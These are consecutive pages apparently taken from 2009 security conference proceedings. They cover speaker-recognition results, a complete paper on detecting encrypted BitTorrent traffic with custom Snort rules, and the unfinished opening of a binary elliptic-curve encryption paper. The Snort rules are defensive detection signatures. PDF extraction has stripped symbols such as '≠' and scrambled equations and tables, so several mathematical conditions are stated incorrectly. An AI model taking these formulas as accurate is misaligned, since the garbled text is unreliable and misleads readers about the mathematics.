3 Experimental Results Some experiments were done to prove validity of the algorithms and to test quality of the proposed features. For the purpose of the experiments, a voice database was created in order to test all suggested features and algorithms [10]. The tests included LPC coefficients, the MFCC with the delta coefficients, cepstral coefficients and the new speaker dependent coefficients proposed in this paper. The first feature sets consisted of the first 12 (LPC-12) and 24 (LPC-24) LPC coefficients. The other sets consisted of the Mel-Frequency Cepstrum Coefficients, which are very widely used in the speech recognition. These sets were 13 MFCC, 13 MFCC with 13 first order delta coefficients (MFCC+D), and 13 MFCC with 13 MFCC+D and 13 second order delta coefficients (MFCC+DD). Last common coefficients were the cepstral coefficients – 12 and 24 coefficients of the cepstrum. Next, there was a group of two Speaker Dependent Frequency Cepstrum Coefficients (SDFCC) based sets consisting of 16 coefficients calculated using the triangular filter bank of type I and II. 3.1 Speaker Verification and Identification

The speaker recognition experiments consisted of two main groups – the speaker verification approach and the speaker identification approach to the speaker recognition [7]. The recogniser was based on a Hidden Markov Model with Gaussian Mixtures (HMM-GM [8]) with 3 states, which is quite enough for given conditions.

262

F. Orság

Fig. 2. FRR (solid line) and the FAR (dotted line) as the functions of the threshold T for the verification process of the combined set of samples (6 training samples + 5 unknown samples for every speaker). The commonly used feature sets are compared – LPC, MFCC and cepstrum coefficients – to the SDFCC of type I and II. In case of the MFCC and SDFCC-I-Triang you can see marked EER and the corresponding threshold T.

Speaker Dependent Frequency Cepstrum Coefficients

263

Table 1. Resume of the experimental results Resume of the experimental results of the speaker verification (V) and identification (I) V

I

V

I

V

combined

training

Testing samples

unknown samples samples

Features

I

EER [%]

samples

EER [%]

LPC12

2.88

7.71

LPC24

5.05

MFCC

6.70

EER [%]

EER [%]

EER [%] EER [%]

4.80

16.24

0.53

0.60

10.18

7.98

20.00

1.29

2.87

25.93

11.53

42.64

1.34

12.00 45.20

MFCC+D

16.71

47.45

24.17

48.64

10.50

MFCC+DD

30.17

47.56

83.92

49.12

22.92

44.60

CEPS12

10.81

37.38

12.46

41.76

9.60

33.73

CEPS24

30.72

48.25

29.89

47.92

72.31

48.53

SDFCC-I-Triang

2.06

2.91

4.10

6.40

0.00

0.00

SDFCC-II-Triang

2.12

2.40

4.13

5.28

0.00

0.00

Three groups of samples were tested. The first one was a combination of six training samples and five unknown samples, the second group contained six training samples and the third group contained five unknown samples, which is closest to the reality, since in the real world applications there are only unknown samples. All the results are summarised in the Table 1. The best real world verification solution were the SDFCC-I-Triang and SDFCC-II-Triang based feature sets with EER = 4.10 %. The best identification solution is the SDFCC-II-Triang with the EER equal to 5.28 %. In Fig. 2, you can compare relationship of the False Acceptance Rate (FAR) and False Rejection Rate (FRR) [7][9] with a threshold T when using the common features and SDFCC with the combined testing samples. You can see that the curves differ for each of the feature sets. Almost ideal seems to be the curves given when using the MFCC feature set, however the Equal Error Rate (EER) [7] [9] is rather high in comparison to the EER of the LPC12.

4 Conclusions This paper deals with the speaker recognition technology based on the HMM and using a new feature set designed especially for the speaker recognition purposes – Speaker Dependent Frequency Cepstrum Coefficients (SDFCC). These coefficients aim at the speaker recognition and, in some special cases, are also usable for the speech recognition. The experimental results prove their qualities. Test of the speaker verification proved capability of the SDFCC for this task. The Equal Error Rate

264

F. Orság

(EER), which was lower than 5% in nearly all cases with the minimum at 3.9%, is excellent. Results of the speaker identification are not shameful either. The EER overall lower than 8% with the best EER of 5.04% is good enough. The good performance of the speaker recognition is result of the dependence of the new features on the speaker, because it strengthens speaker’s individual voice characteristics. Generally, the verification approach transpired to perform better than the identification approach, which was expected and proved many times before. Acknowledgements. This research has been done under support of Ministry of Education of the Czech Republic by a grant: “Security-Oriented Research in Information Technology”, MSM0021630528 (CZ).

References 1. Rodman, D.R.: Computer Speech Technology. Artech House, Boston (1999) 2. Sigmund, M.: Speaker Normalization by Long-Time Spectrum. In: Proceedings of Radioelektronika 1996, Brno, CZ, pp. 144–147 (1996) 3. Oppenheim, A.V., Schafer, R.W., Buck, J.R.: Discrete-Time Signal Processing, 2nd edn. Prentice Hall, Upper Saddle River (1999) 4. Sigmund, M.: Estimation of Vocal Tract Long-Time Spectrum. In: Proceedings of Elektronische Sprachsignalverarbeitung, Dresden, vol. 9, pp. 190–192 (1998) 5. Sigmund, M.: Speaker Recognition – Identifying People by their Voices. Conferment thesis FEE BUT, Brno (2000) ISBN 80-214-1590-8 6. Markel, J.D., Gray, A.H.: Linear Prediction of Speech. Springer, New York (1976) 7. Xafopoulos, A.: Speaker Verification. Tampere International Center for Signal Processing, TUT, Tampere, Finland (2001) 8. Baggenstoss, P.M.: Hidden Markov Models Toolbox. Naval Undersea Warfare Centre, Newport, RI (2001) 9. Woodward, J.D., Orlans, N.M., Higgins, P.T.: Biometrics: Identity Assurance in the Information Age. McGraw-Hill/Osborne, Berkley (2003) 10. Orsag, F.: Biometric Security Systems – Speaker Recognition Technology. Dissertation, Brno, CZ (2004)

Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection David A. Carvalho, Manuela Pereira, and Mário M. Freire IT-Networks and Multimedia, Department of Computer Science, University of Beira Interior Rua Marquês d’Ávila e Bolama, P-6201-001 Covilhã, Portugal {david, mpereira, mario}@di.ubi.pt

Abstract. Nowadays, peer-to-peer file sharing applications are very popular, occupying the traffic volume generated by these applications a large percentage of the global network traffic. However, peer-to-peer traffic may compromise the performance of critical networked applications or network-based tasks in institutions, being need, in some cases, to block such traffic. However, this task may be particularly difficult, namely when that peer-to-peer traffic is encrypted and therefore being difficult to block. This paper presents a contribution towards the detection and blocking of encrypted peer-to-peer file sharing traffic generated by BitTorrent application. The proposed method is based on deep packet inspection and makes use of Snort, which is a popular open source network-based intrusion detection system. Experiments have been carried out to validate the proposed method as well as its accuracy. Keywords: Peer-to-peer file-sharing applications, traffic identification, deep packet inspection, traffic monitoring, peer-to-peer content filtering and management.

1 Introduction As the Transmission Control Protocol/Internet Protocol (TCP/IP) architecture becomes the dominant architecture for applications, contents and services, these are gradually migrating from the client-server paradigm to the peer-to-peer (P2P) paradigm. Recently, P2P systems have received a great amount of interest as a promising scalable, reliability and cost-effective solution for multimedia content sharing and distribution. Nowadays, P2P file sharing applications such as BitTorrent, Vuze, eMule, Limewire and GTK-Gnutella, among others, have achieved a tremendous success in the past few years. In this kind of systems, as more clients join, more resources are made available, which speeds up downloading and therefore may attract more clients. The traffic generated by P2P applications has become a dominating part of the global Internet traffic, being estimated to be around 60-70% [1], [2]. Without suitable network management, the traffic generated by this kind of applications may compromise the performance of critical networked applications or network-based tasks in institutions. D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 265–272, 2009. © Springer-Verlag Berlin Heidelberg 2009

266

D.A. Carvalho, M. Pereira, and M.M. Freire

The traffic generated by first generation P2P applications was relatively easy to detect due to the fact that these applications used well-defined port numbers. However, nowadays, the traffic generated by P2P applications may be very difficult to detect because P2P applications may use different port numbers to escape the detection, do not use the default service port or use port 80 assigned for HTTP traffic [3], [4]. Besides, they may use obfuscation options where the traffic is encrypted, making therefore very difficult its detection. On the other side, link speeds in LANs are reaching speeds in the Gigabit per second range, which may become the detection infeasible since the processing speed cannot match the line speed and capturing every packet may pose severe requirements in terms of processing and memory capacities. As detection and classification mechanisms evolve, P2P evasive techniques also evolve making traffic detection and classification a very difficult task. Recently, some approaches have been proposed to detect P2P applications. These techniques may be classified into two main categories [2], [5]: based on payload inspection or signaturebased detection; and based on flow traffic behaviour. Deep packet inspection methods inspect the packet payload to locate specific string series, which are called signatures that identify a given characteristic, a given protocol or a given application, where as methods based on traffic behaviour attempt to detect and classify possible protocols or applications without looking into the payload contents. Some approaches have been proposed for traffic identification using behaviourbased methods. The method based on transport-level connection patterns relies on two heuristics for P2P traffic classification: 1) it involves the simultaneous use of TCP and UDP by a pair of communicating peers and 2) regarding the connection patterns for (IP, port) pairs, the number of distinct ports communicating with a P2P application on a given peer will likely match the number of distinct IP addresses communicating with it [2]. The behavioural method based on entropy reported in [5] requires the evaluation of the entropy of the packet sizes in a given time window and works onthe-fly. Several approaches requiring the analysis of some fields of the header of TCP or IP packets for flow-based P2P traffic detection have been proposed based on machine learning [4], [6], support vector machines [7], [8], and neural networks [9]. This kind of methods may be used for high-speed and real-time communications with encrypted traffic or unknown P2P protocols. The main drawback is the possible lack of accuracy in the identification of P2P traffic. Methods based on the payload inspection may be accurate, but may lead to network performance degradation under low latency or high-speed operations. Besides, they may not be useful when payload is encrypted or for new P2P protocols or in the cases where legal or privacy issues do not allow their use [2], [3]. Nowadays, one of the main challenges regarding P2P file-sharing traffic detection is concerned with the on-line detection of encrypted traffic under high-speed and realtime communications, where fast P2P traffic identification is required in order to avoid network performance degradation. To address this issue, we are developing an hybrid method for on-line P2P traffic identification, including encrypted traffic, based on a combination of the flow behaviour method using the evaluation of the entropy of the packet sizes in a given time window reported in [5] and deep packet inspection, to complement the first approach, in order to reduce false positives and false negatives. In this paper, we report the development of signatures for deep packet inspection for BitTorrent application as a piece of the puzzle.

Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection

267

2 Methodology for P2P Traffic Detection Using Signatures The methodology used for the detection of P2P file sharing traffic makes use of an open source and widely used intrusion detection system, called Snort [10], which runs over Windows, Linux/Unix or MAC operating systems and is adapted from the methodology presented in [11]. The signatures of payloads of packets to identify are expressed in terms of Snort rules. The identification of Snort rules for detection of packets generated by a given P2P application, requires the execution of the following steps: i) identification of signatures associated with a given P2P protocol that can be revealed through the analysis of the payload of an IP packet; ii) writing Snort rules incorporating these signatures in order to detect all packets with that particular signatures. Using this methodology, we developed Snort rules for the detection of P2P traffic generated by BitTorrent application, being paid particular attention to the detection of encrypted traffic. The identification of signatures associated with the packets generated by this application was made manually through the observation of repetitive patterns in the sequence of packets generated by BitTorrent, even with encryption of the payload. Those common patterns observed in the payload were then used to manually write the rules for the detection engine, which allow the identification of a given packet that contains that particular pattern in a particular position or after a given offset in its payload.

3 Experimental Setup The experimental testbed includes several machines with different characteristics and running different operating systems at our research lab (NMCG Lab). All outgoing and incoming traffic for servers, workstations and laptops used at this lab is controlled by a computer running Smoothwall Express 3.0, which is a network administration specific Linux distribution, from SmoothWall Open Source Project [12], providing Internet security and Web filtering products. Although the SmoothWall Express 3.0 version has not the same capabilities as the commercial products, it enables powerful extended possibilities at very low cost, which was the main reason for its choice during the NMCG lab planning and deployment. This Lab has 24 8P8C sockets connecting to an Enterasys C2H128-48 switch through UTP Ethernet Enhanced Cat5 cabling. The switch then connects to the network backbone device of the Department of Computer Science building, an Enterasys E7 just one floor above, via an optical fibre uplink, which in turn, connects to the rest of University. All external communication with the University is made using an Enterasys SSR main router, located at the Center for Computer Science of the University. To run P2P software, it is not usually necessary a great computing power. Usually, the most important feature is the size of the hard disk. When dealing with P2P file sharing programs, transferred files can easily reach a few gigabytes, since they are mostly movies, videos, music albums, games, etc. Real time network monitoring requires a lot more of memory and CPU. Therefore there were used more recent machines for the most critical applications, like the traffic classifier SNORT [10], or the analysis engine BASE [13] or even the packet analyzer Wireshark [14]. As for

268

D.A. Carvalho, M. Pereira, and M.M. Freire Table 1. Characteristics of hardware and software used for P2P traffic detection

Type Operating System CPU RAM Workstation Fedora 9 Core 2 Duo 2.66 GHz 1 GB

Software Snort, Wireshark, BASE, Barnyard, Gtk-Gnutella, Livestation Workstation Windows XP SP3 Pentium III 800 MHz 512 MB BitTorrent, eMule, aMule, Limewire, Livestation, TVU Player Wireshark, eMule, Laptop Windows VistaCore 2 Duo 2.4 GHz 3 GB SP1 / Fedora 10 TVUPlayer, Livestation Laptop MAC OS X (10.5) Power PC G4 1GHz 769 MB Vuze, Livestation, TVUPlayer

running P2P software, pretty old machines were used, since they were mainly used for this purpose. Main characteristics of the hardware and the software used for the experiments are shown in Table 1. In all practical experiences reported here, Snort was forced to analyse other network traffic than P2P, like HTTP, Windows Remote Desktop Connection (RDC), SSH, etc. In fact, this was quite worthy, since it enabled the testbed to run in similar circumstances of those of deployed P2P classifiers, which also have to deal with network traffic generated by a vast number of applications and then to correctly identify P2P among it.

4 BitTorrent Application 4.1 Application Details BitTorrent application version 6.1.2 was configured so that it would only allow bidirectional encrypted connections, i.e., both outgoing and incoming traffic had to be encrypted, so that communication was possible with other BitTorrent clients (applications). Nowadays, users tend to use these settings to avoid being throttled or blocked by their ISPs. As a consequence, there are not so many sources available to download if one does not use the Forced setting for outgoing encrypted traffic, since other clients are mostly configured to deny legacy connections, thus not allowing unencrypted connections. These settings are configured under the menu Options Æ Preferences Æ BitTorrent Æ Protocol Encryption. To only use encrypted connections, the Outgoing combo box must be set with the value Forced and Allow incoming legacy connections must be unchecked. In all of the following tests, the setting Ask the tracker scrape information, also under Options Æ Preferences Æ BitTorrent Æ was always checked. This enables the client to obtain newer peers and provide statistics about their availability. Although it is not mandatory, specially if other mechanisms are used to obtain peer information like the DHT, it can be useful to maintain updated records about resource availability. It is important to notice that if this setting is unchecked, there is no traffic for BitTorrent tracker request and, consequently, the rules for detecting it are never

Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection

269

triggered. In this work, it was kept checked for studying the frequency of communications to the tracker. 4.2 SNORT Rules and Experiments with Encrypted Traffic The first two tests were conducted with the previous mentioned settings and with DHT disabled, so that BitTorrent would not generate too much control traffic, making it harder to detect. The following rules were triggered and corresponding test results are provided in Table 2. Snort Rule 1000301. Rule for detection of traffic generated by BitTorrent application. alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"P2P BitTorrent outbound announce request"; flow:to_server,established; content:"GET"; offset:0;depth:4; content:"/announce"; distance:1; content:"info_hash="; offset:4; content:"event=started";offset:4; classtype:policyviolation; sid:1000301; rev:1;)

Snort Rule 1000305. Rule for detection of traffic generated by BitTorrent application. alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent outbound - tracker request"; flow:to_server,established; content:"GET"; offset:0; depth:4; content:"/scrape"; distance:1; content:"info_hash="; offset:12; content:"User-Agent:"; offset:80;classtype:policy-violation; sid:1000305; rev:1;)

Table 2. Characteristics of experiences and detection results for BitTorrent application Date Start End Packets Bytes P2P Downloaded P2P Uploaded Rule-Count 17-01-2009 20:34 21:58 280791 107825488 22 MB 18.4 MB 1000301-1 1000305-1 27-01-2009 21:31 21:44 23175 10546443 1.2 MB 3.0 MB 1000301-1 1000305-1

So, even with DHT disabled, the above two snort rules for TCP traffic are frequently triggered. In this case, it happened only once, due in part to the small amount of BitTorrent traffic. In the following tests, one can confirm a greater occurrence of them. Once again it is important to emphasize, that if the Ask the tracker scrape information was unchecked, rule 1000305 would never be triggered at all. For the next tests (see Table 3), four rules were introduced. They refer to DHT traffic, and use the UDP unlike the previous ones. Each of the next sets of the first two and last two rules could be combined into a single one. The only advantage in specifying them independently is that it allows distinguishing incoming and outgoing traffic. As one can easily see, enabling the useful DHT feature allows the successfully identification of UDP traffic for trackerless requests and trackerless responses. Snort Rule 1000306. Rule for detection of traffic generated by BitTorrent application. alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent outgoing DHT for trackerless comunication request (d1:ad2:id20)"; content:"d1:ad2:id20"; nocase;depth:11;classtype:policy-violation; sid:1000306; rev:2;)

270

D.A. Carvalho, M. Pereira, and M.M. Freire

Snort Rule 1000307. Rule for detection of traffic generated by BitTorrent application. alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent incoming DHT for trackerless comunication request (d1:ad2:id20)"; content:"d1:ad2:id20"; nocase;depth:11;classtype:policy-violation; sid:1000307; rev:3;)

Snort Rule 1000308. Rule for detection of traffic generated by BitTorrent application. alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent incoming DHT for trackerless comunication response (d1:rd2:id20)"; content:"d1:rd2:id20"; nocase;depth:11;classtype:policy-violation; sid:1000308; rev:3;)

Snort Rule 1000309. Rule for detection of traffic generated by BitTorrent application. alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent outgoing DHT for trackerless comunication response (d1:rd2:id20)"; content:"d1:rd2:id20"; nocase;depth:11;classtype:policy-violation; sid:1000309; rev:3;)

Table 3. Characteristics of an experience and its detection results for BitTorrent application Date Start End Packets Bytes P2P Downloaded P2P Uploaded Rule-Count 01-02-2009 23:01 23:21 71783 46023309 15 MB 6.1 MB 1000301-3 1000305-2 1000306-1562 1000307-689 1000308-24 1000309-30

Two additional rules were triggered during the tests on the BitTorrent application. They are available at [15] and are listed bellow. Snort Rule 2008581. Rule for detection of traffic generated by BitTorrent application [15]. #http://www.emergingthreats.net/rules/emerging-p2p.rules #By David Bianco alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET P2P BitTorrent DHT ping request"; content:"d1n:ad2n:id20n:"; depth:12; nocase; threshold: type both, count 1, seconds 300, track by_src; classtype:policyviolation; reference:url,wiki.theory.org/BitTorrentDraftDHTProtocol; sid:2008581; rev:1;)

Snort Rule 2008584. Rule for detection of traffic generated by BitTorrent application [15]. alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET P2P BitTorrent DHT get_peers request"; content:"d1n:ad2n:id20n:"; nocase; depth:12; content:"9n:info_hash20n:"; nocase; distance:20; depth:14; content:"e1n:q9n:get_peers1n:"; nocase; distance:20; depth:17; threshold: type both, count 1, seconds 300, track by_src; classtype:policy-violation; reference:url,wiki.theory.org/BitTorrentDraftDHTProtocol; sid:2008584; rev:1;)

Rule 2008581 is identical to the locally developed 1000306. They share some of their content, more exactly d1:ad2:id20. Even though, rule 1000306 triggered 614

Towards the Detection of Encrypted BitTorrent Traffic through Deep Packet Inspection

271

times against a single one of 2008581. With these additional rules included and also enabling the DHT features, the results presented in Table 4 were obtained. Table 4. Characteristics of an experience and its detection results for BitTorrent application Date 03-02-2009

Start End Packets Bytes P2P Downloaded P2P Uploaded Rule-Count 20:47 20:59 20434 8642013 147.1 KB 3.4 MB 1000301-3 1000305-3 1000306-614 1000307-222 1000308-17 1000309-11 2008581-1 2008584-1

Another test was conducted in the same circumstances than the previous, but generating a bit more traffic. For this, it was select a torrent file for a drama movie released in 2008. The results obtained are listed in Table 5. Table 5. Characteristics of an experience and its detection results for BitTorrent application Date Start End Packets Bytes P2P Downloaded P2P Uploaded Rule-Count 07-02-2009 19:53 22:57 231536 134571450 63.5 MB 46.7 MB 1000301-2 1000305-2 1000306-8423 1000307-4258 1000308-57 1000309-31

As one can see, rules 1000306, 1000307, 1000308 and 1000309 are triggered much often than 1000301 and 1000305. This is because when DHT is enabled, peers communicate frequently with each other to check for data and peer availability. As for rule 1000301, it is only triggered when a peer tells another that it is interested in some file shared by it and this usually occurs only just before beginning the download of another chunk. If the scrape feature is disabled, through the Ask the tracker scrape information option, rule 1000305 is not triggered at all, since communication with the tracker with the scrape content does not occur.

5 Conclusions This paper describes the use of a deep packet inspection method based on signatures coded as SNORT rules for detection of encrypted P2P traffic generated by BitTorrent application. Several lab experiments were carried out to validate the proposed method and to evaluate its accuracy. As a future work, we intend to integrate this method as part of a hybrid method that also considers a flow-based method based on entropy [5] to work under high speed (1-10 Gbps) and low latency.

272

D.A. Carvalho, M. Pereira, and M.M. Freire

Acknowledgments. This work has been partially funded by Portuguese Fundação para a Ciência e a Tecnologia through TRAMANET Project contract PTDC/EIA/73072/2006.

References 1. PeerApp: Comparing P2P Solutions (2007), http://www.peerapp.com/docs/ComparingP2P.pdf 2. Madhukar, A., Williamson, C.: A Longitudinal Study of P2P Traffic Classification. In: 14th IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems ( MASCOTS 2006), pp. 179–188. IEEE Press, New York (2006) 3. Guo, Z., Qiu, Z.: Identification Peer-to-Peer Traffic for High Speed Networks Using Packet Sampling and Application Signatures. In: 9th International Conference on Signal Processing (ICSP 2008), pp. 2013–2019. IEEE Press, New York (2008) 4. Liu, H., Feng, W., Huang, Y., Li, X.: A Peer-To-Peer Traffic Identification Method Using Machine Learning. In: International Conference on Networking, Architecture, and Storage (NAS 2007), pp. 155–160. IEEE Press, New York (2007) 5. Gomes, J., Inacio, P., Freire, M., Pereira, M., Monteiro, P.: Analysis of Peer-to-Peer Traffic Using a Behavioural Method Based on Entropy. In: IEEE International Performance, Computing and Communications Conference (IPCCC 2008), pp. 201–208. IEEE Press, New York (2008) 6. Soysal, M., Schmidt, E.G.: An accurate evaluation of machine learning algorithms for flow-based P2P traffic detection. In: 22nd International International Symposium on Computer and Information Sciences (ISCIS 2007), pp. 1–6. IEEE Press, New York (2007) 7. Gonzalez-Castano, F.J., Rodriguez-Hernandez, P.S., Martinez-Alvarez, R.P., Gomez, A., Lopez-Cabido, I., Villasuso-Barreiro, J.: Support Vector Machine Detection of Peer-toPeer Traffic. In: IEEE International Conference on Computational Intelligence for Measurement Systems and Applications, pp. 103–108. IEEE Press, New York (2006) 8. Gao, Z., Lu, G., Gu, D.: A Novel P2P Traffic Identification Scheme Based on Support Vector Machine Fuzzy Network. In: Second International Workshop on Knowledge Discovery and Data Mining (WKDD 2009), pp. 909–912. IEEE Press, New York (2009) 9. Raahemi, B., Kouznetsov, A., Hayajneh, A., Rabinovitch, P.: Classification of Peer-toPeer traffic using incremental neural networks (Fuzzy ARTMAP). In: Canadian Conference on Electrical and Computer Engineering (CCECE 2008), pp. 719–724. IEEE Press, New York (2008) 10. Snort, http://www.snort.org 11. Spognardi, A., Lucarelli, A., Di Pietro, R.: A Methodology for P2P File-sharing Traffic Detection. In: Second International Workshop on Hot Topics in Peer-to-Peer Systems (HOT-P2P 2005), pp. 52–61. IEEE Press, New York (2005) 12. Smoothwall open source project, http://www.smoothwall.org 13. Basic analysis and security engine (base), http://base.secureideas.net 14. Wireshark, http://www.wireshark.org 15. Emerging threats, http://www.emergingthreats.net/rules/emerging-p2p.rules

A Simple Encryption Scheme for Binary Elliptic Curves Brian King Purdue School of Engineering & Technology Indiana University Purdue University Indianapolis [email protected]

Abstract. In this work, we discuss elliptic curves defined over binary fields (curves defined over F2n ). We introduce a simple public-key encryption scheme for binary elliptic curves. and demonstrate that this encryption scheme is as secure as the EC El Gamal cryptosystem. The basis of the encryption scheme is an isomorphism between binary elliptic curves. This same isomorphism can be used as an implementation tool (to reduce the computational complexity).

1

Introduction

In many situations, public key encryption is necessary to deliver “small messages” or to deliver encryption keys of content encrypted with symmetric cryptosystems. Elliptic Curve Cryptography is a common public-key encryption system that is used for applications where bandwidth is a concern. An example of a elliptic curve public-key cryptosystem is Elliptic Curve El Gamal. In this case, the message would have to be a point on the elliptic curve. Initially the problem of encrypting message would require running a probabilistic message mapping method [10].1 In this work we will describe a simple encryption scheme defined over binary elliptic curves. In our encryption scheme message mapping will be straightforward and deterministic. Further, we demonstrate that our encryption scheme is as secure as the EC El Gamal cryptosystem [5]. Our encryption system requires a Elliptic Curve Diffie Hellman calculation, the application of an isomorphism (between binary elliptic curves), and then a field multiplication. 1

Here the message m would be mapped to an x-coordinate of the prime subgroup of the elliptic curve. If m was not an x-coordinate of such a point would modify m, in an iterative and deterministic way until the result is n x-coordinate of the prime subgroup of the elliptic curve. One then uses the resulting elliptic curve point in the encryption. The receiver on the other side, after decryption, will need go through a similar iterative process (reverse) to find the message [10].

´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 273–280, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

274

2 2.1

B. King

Background The Trace Function in F2n

The trace function, denoted by T r, is a mapping of F2n onto Z2 such that T r(α + β) = T r(α) + T r(β). The trace of an element α ∈ F2n can be computed  2i as T r(α) = n−1 [3]. In most binary fields F2n that are used for elliptic i=0 α curve cryptography, the trace can be computed by examining “a few bits of the field element”. For example in the Galois field F2283 with generating polynomial t288 + t12 + t7 + t5 + 1, for μ ∈ F2283 , then trace can be computed as T r(μ) = μ0 +μ277 , where μ = μ277 u277 +· · · μ1 u+μ0 using a polynomial basis to represent field elements. In addition to the linearity property, the trace function satisfies that T r(α2 ) = T r(α). Further, when n is odd then T r(1) = 1. Due to an attack, it is recommended that whenever one uses an elliptic curve defined over F2n , n should be prime. Consequently for all α ∈ F2n with T r(α + 1) = T r(α) + 1. For b ∈ F2n , the quadratic equation λ2 + λ = b in F2n has a solution if and only if T r(b) = 0 [3]. Therefore, whenever λ is a solution to the above quadratic equation, λ + 1 is also a solution. Recall T r(λ + 1) = T r(λ) + 1. Thus, when n is odd for each solvable quadratic equation there is a solution with trace 1 and a solution with trace 0. A solution to the quadratic equation λ2 + λ = b can be (n−1)/2 22j b [1]. computed efficiently by λ = j=0 In this work, we use Solve(s) to denote an algorithm which returns a solution to the quadratic equation λ2 + λ = s. Solve(s) returns No solution whenever T r(s) = 0. If a solution exists then since there are two solutions, it will return an arbitrary solution. 2.2

Elliptic Curves Defined over F2n

The standard equation for a non supersingular elliptic curve defined over the finite field F2n is: (1) y 2 + xy = x3 + ax2 + b where a, b ∈ F2n , b = 0. The points P = (x, y) where x, y ∈ F2n , that satisfy equation (1), together with the point O, called the point of infinity, form the additive abelian group Ea,b . The addition within Ea,b is defined by: For all P1 , P2 ∈ Ea,b 1. P1 + O = P1 , 2. for P1 = (x1 , y1 ) = O, the point −P1 is computed as −P1 = (x1 , x1 + y1 ) 3. and for all P1 = (x1 , y1 ) , P2 = (x2 , y2 ), where both P1 = O, P2 = O and P1 = −P2 , the point P1 + P2 is computed as P1 + P2 = P3 = (x3 , y3 ) where x3 , y3 ∈ F2n such that x3 = λ2 + λ + x1 + x2 + a and y3 = λ(x1 + x3 ) + x3 + y1 y1 2 where λ = xy11 +y +x2 if P1 = P2 and λ = x1 + x1 for P1 = P2 . The elliptic curve Ea,b is selected so that Ea,b contains a large subgroup of prime order. The cryptographically relevant points will be non-trivial elements of the subgroup of large prime order.

A Simple Encryption Scheme for Binary Elliptic Curves

275

2

If (x, y) ∈ Ea,b and x = 0 then xy 2 + xy = x + a + xb2 . Let z = xy , then we see that z 2 + z = x + a + xb2 . Since this quadratic equation is solvable, we see that T r(x + a + xb2 ) = 0. In [8], Seroussi demonstrated that a necessary condition for a point P = (x1 , y1 ) ∈ Ea,b to belong to the prime subgroup of Ea,b is that T r(x1 ) = T r(a). Thus a field element α ∈ F2n is the x-coordinate of a point that belongs to the prime subgroup of Ea,b if and only if T r(α + a + αb2 ) = 0 and T r( αb2 ) = 0. 2.3

Isomorphisms of Binary Elliptic Curves

We now make a series of recollections and observations concerning the elliptic curve parameters that define the elliptic curve in equation (1). The following result is provided in [9, 1]. Theorem 1. [9, 1] Let γ ∈ F2n such that T r(γ) = 0 then for all a, b we have |Ea+γ,b | = |Ea,b |. In [9], it was shown that the curves Ea+γ,b and Ea,b are isomorphic to each other, when T r(γ) = 0. Theorem 2. [9] Suppose γ ∈ F2n such that T r(γ) = 0. Then Ea+γ,b and Ea+γ,b are isomorphic. Further, the map f : Ea+γ,b −→ Ea,b where f (O) = O and for all (x, y) ∈ Ea+γ,b f (x, y) = (x, y + x · Solve(γ)) is an isomorphism. Let S denote Solve(γ), then by the above Theorem 2, Ea,b and Ea+γ,b are isomorphic, where the isomorphism f (x, y) = (x, y + x · S). Further, the inverse map f −1 satisfies f −1 (˜ x, y˜) = (˜ x, y˜ + x ˜ · S). A consequence of this theorem is that if Ea,b represents a cryptographically secure elliptic curve defined over F2n , then there exists 2n−1 many cryptographically secure curves defined over the same field that are “equivalent” (this follows from the fact that half of the field elements of F2n have trace zero). Also, observe that if one needed to compute the scalar multiple kG for G ∈ Ea,b , then one can compute the scalar multiple kf (G) in Ea+γ,b . Once kf (G) has been computed, since kf (G) = f (kG), we can compute kG by kG = f −1 (kf (G)). Thus if (˜ x, y˜) = kf (G), then kG = (˜ x, y˜ + x ˜ · S). The extra complexity cost of computing kG using kf (G) (outside of the scalar arithmetic) is the cost of computing f (G) which will require one field multiplication, and the cost of computing f −1 (kf (G)) which requires one field multiplication and the cost of computing S, where S = SOLVE(γ). The reason to do this is that the computational complexity of computing a scalar multiple may be smaller when using the elliptic curve Ea+γ,b . This would occur if one was using a projective point implementation to compute the scalar multiple of a point. 2.4

An Application of the Isomorphism

Let M be an arbitrary element of F2n . How could M be imbedded into an elliptic curve point? It is very unlikely that there exists some x such that (x, M ) ∈ G

276

B. King

(here G denotes the prime subgroup of Ea,b ). It is also unlikely that there exists some y such that (M, y) ∈ G. When elliptic curve cryptography was first proposed for use as a public-key encryption method the task of mapping a message to a point on the elliptic curve was reduced to using a probabilistic method of mapping the message to an elliptic curve point. However this does not impact the use of elliptic curves for cryptographic reasons because typical applications of elliptic curve cryptography is key agreement, digital signatures and the encryption of data via a hybrid encryption method such as ECIES [11]. Our interest is to construct an encryption scheme using ECC, so we are not concerned with mapping messages to an elliptic curve, but rather the mathematics that we can exploit. To this end, let P1 = (x1 , y1 ) be a point of the prime subgroup G of Ea,b . 2 Since P1 ∈ Ea,b we know that T r(x1 + a + xb2 ) = 0. Observe that T r( M + x2 1

1

2 b b M2 M ) = T r( M + M x1 ) + T r(x1 + a + x21 ) = T r( x2 + x1 ) + 0 = x21 x21 2 2 T r( M ) + T r( M x1 ) = 0, since for all field elements α, we have T r(α ) = T r(α). x21 2 b Let γ = M +M x1 + x1 + a + x21 . Then T r(γ) = 0. Hence Ea,b is isomorphic to x21

M x1

+ x1 + a +

Ea+γ,b . Therefore Ea+γ,b has a prime subgroup isomorphic to G of Ea,b . Now the 2 ordered pair (x1 , M ) satisfies M + xM1 +x1 +a+γ+ xb2 = 0. Thus (x1 , M ) ∈ Ea+γ,b . x21 1 Further, T r(x1 ) = T r(a) = T r(a + γ). Due to a result by Seroussi [8], (x1 , M ) belongs to the prime subgroup of Ea+γ,b . 2.5

Elliptic Curve El Gamal Public-Key Encryption (EC El Gamal)

